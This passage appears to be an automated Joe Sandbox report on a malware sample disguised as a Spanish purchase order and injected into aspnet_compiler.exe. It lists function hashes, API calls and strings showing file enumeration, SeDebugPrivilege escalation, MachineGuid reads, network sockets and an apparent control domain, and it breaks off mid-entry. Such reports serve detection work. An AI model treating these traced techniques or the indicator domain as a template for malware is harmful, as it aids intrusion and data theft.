Instruction Fuzzy Hash: 12F039B4D1438CEFCB12EBA8A84929CBFB0FB45300F0085EAD84493251D7315A42DF81

Function 014D22D5 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39fdf813760e63f2225b7c01b5d16e1f73e108ef19f7a2e2e42c33b103fc4024
Instruction ID: 31813763129b52807003048a44488899269edcea02775722ba38e06249eeb92f
Opcode Fuzzy Hash: 39fdf813760e63f2225b7c01b5d16e1f73e108ef19f7a2e2e42c33b103fc4024
Instruction Fuzzy Hash: F1F06278908329CFCF60CF64E9A4AADBBB5BB1A301F0054A6E41DA3215DB715A85CF05

Function 014D17B0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53333c9c3eca5f2d42756af6d77e458b22c0ef15146bcd5d2fff88a921d21efe
Instruction ID: 8287a784ae717fa8318cf27642d7792e7f8dba7305811f2ab584024150d116f0
Opcode Fuzzy Hash: 53333c9c3eca5f2d42756af6d77e458b22c0ef15146bcd5d2fff88a921d21efe
Instruction Fuzzy Hash: 31F09278E09218DFCF25CF64D994A9CBBF1AF19300F14909AE819AB362D730A941CF00

Function 014D1A29 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9561193a3f2213bd3f0818cf48a39923a61b05648397c00ca02a6869d31a30af
Instruction ID: a6e2171043b131656d6480f2839fa01678eed702f491fa32652555d78c3d683a
Opcode Fuzzy Hash: 9561193a3f2213bd3f0818cf48a39923a61b05648397c00ca02a6869d31a30af
Instruction Fuzzy Hash: A2E0C278608A54CFCB51DF28D9A89A57BB8BB8EB01F4010D6E90A9B331C734AD40CE10

Function 014D1973 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 226452219cff099c0f9f86769df041c7b94d70e1a22e8fe6067a83d9c29c6049
Instruction ID: 1bb2ea6c092e20d9042fea72988f49786a482cbc6a1a7836f4c6ef01c356c8fd
Opcode Fuzzy Hash: 226452219cff099c0f9f86769df041c7b94d70e1a22e8fe6067a83d9c29c6049
Instruction Fuzzy Hash: 29E08C39E0611AEFCB909BA4F848ADAF730FF12311F044096D85A93012C73109A6CF01

Function 014D0DD8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7707b3bf90f4dcd7d6fa78a89c4e7f01d2be3df7ccf4db88b7a7490c0533b524
Instruction ID: ed0e7df169cf05cad550f3765e4a58d302f4ab62bb95230f73d1f4adb135b87a
Opcode Fuzzy Hash: 7707b3bf90f4dcd7d6fa78a89c4e7f01d2be3df7ccf4db88b7a7490c0533b524
Instruction Fuzzy Hash: D0E0B674D0020CEFCB54EFA8E44869DBBF4FB48301F1081AAD818A3354D7345A51DF81

Function 014D1616 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c4e7c479996f30add699e63d45ab3c325a22949580544d15b4673a2c5cad390
Instruction ID: fea313a9ddf2098962d831dff51120babc81f55ef8ad3cdfcd2739a34c61633b
Opcode Fuzzy Hash: 6c4e7c479996f30add699e63d45ab3c325a22949580544d15b4673a2c5cad390
Instruction Fuzzy Hash: 43E04F78949219CFDF64DFA4D894AECBBB8BB49700F0051DAC80EA7350CB325D818F40

Function 014D1561 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3bafa18c43b298b6434b09200544b81d7b399513e20824f12fbbddf84d61123
Instruction ID: ecbfa858ac91b4f289eab1c0aff256575b9c71089547d23dc43f61b549728829
Opcode Fuzzy Hash: f3bafa18c43b298b6434b09200544b81d7b399513e20824f12fbbddf84d61123
Instruction Fuzzy Hash: 86E0E5B4608690CFCB51CB28D9989D53BB4BF4E311F1401E6E44A9B372C730D942CF00

Function 014D1EF2 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06f9c1dbaec6829c5b63ced6bb6cb8a779a590015c340c66e1329ea06d43477e
Instruction ID: d4cc66a782af44e1693d42350639a66442fe9800ea9d755b3ce55df0d5ba4867
Opcode Fuzzy Hash: 06f9c1dbaec6829c5b63ced6bb6cb8a779a590015c340c66e1329ea06d43477e
Instruction Fuzzy Hash: 6FD0E974808654DFCF519F28C95D5D9B7B4FF19701F1011F6D809AA225D7354D91DF40

Function 014D14B3 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4d2269bcfb5c8d6197cbe54bf1d5eb0147e311a2f70582c5df3c940ed2c5858
Instruction ID: c305632bf9f87f4d7aa31d36009b060303ee09eed67b0cbf6fcf1768b18286ff
Opcode Fuzzy Hash: d4d2269bcfb5c8d6197cbe54bf1d5eb0147e311a2f70582c5df3c940ed2c5858
Instruction Fuzzy Hash: 4ED0CAB4802218CBEBA0CF60DC88B8CBBB0BB08300F10819AD44AB3240CA300EC88F08

Function 014D1E87 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02e76b5401dd556e8781559b05f294423eb4ef779c3671dc0a3391ee38a4cab
Instruction ID: 9e43225ab28af6b60ccfd75647df1678b75f806193eac400b5e9f8cd2335a83e
Opcode Fuzzy Hash: f02e76b5401dd556e8781559b05f294423eb4ef779c3671dc0a3391ee38a4cab
Instruction Fuzzy Hash: EAC00278614214DFCB40DF54D894C58B775FF4DB117115055E8065B335C735AC41CA00

Analysis Process: aspnet_compiler.exePID: 6128, Parent PID: 2584COMMON

Execution Graph

Execution Coverage:	30.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.4%
Total number of Nodes:	1846
Total number of Limit Nodes:	93

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

Program Files, xrefs: 00403E01
%s\*, xrefs: 00403D99
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C
Windows, xrefs: 00403DEA

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B
IDA, xrefs: 00406304

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: d0395f9089772e9078c0cbeb7e7a69d574c5e4bdcef80e12950fd19a5f1576fd
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: d0395f9089772e9078c0cbeb7e7a69d574c5e4bdcef80e12950fd19a5f1576fd
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: d0cbd2bfe5b0935c94ba089aae0b4a72727b205c69b8882af43eb62a71f59e55
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: d0cbd2bfe5b0935c94ba089aae0b4a72727b205c69b8882af43eb62a71f59e55
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess_wmemset
String ID: CA
API String ID: 2773065342-1052703068
Opcode ID: cab46f4d188c0a5189c49f3585cfa10eddaab0cbfa80d2b27664b61f9bed3b3c
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: cab46f4d188c0a5189c49f3585cfa10eddaab0cbfa80d2b27664b61f9bed3b3c
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: 18f61375b21b2ca1c3d5cfb75848ec819ade9bcc4ac2f6c13c281ff8ddb16e17
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: 18f61375b21b2ca1c3d5cfb75848ec819ade9bcc4ac2f6c13c281ff8ddb16e17
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

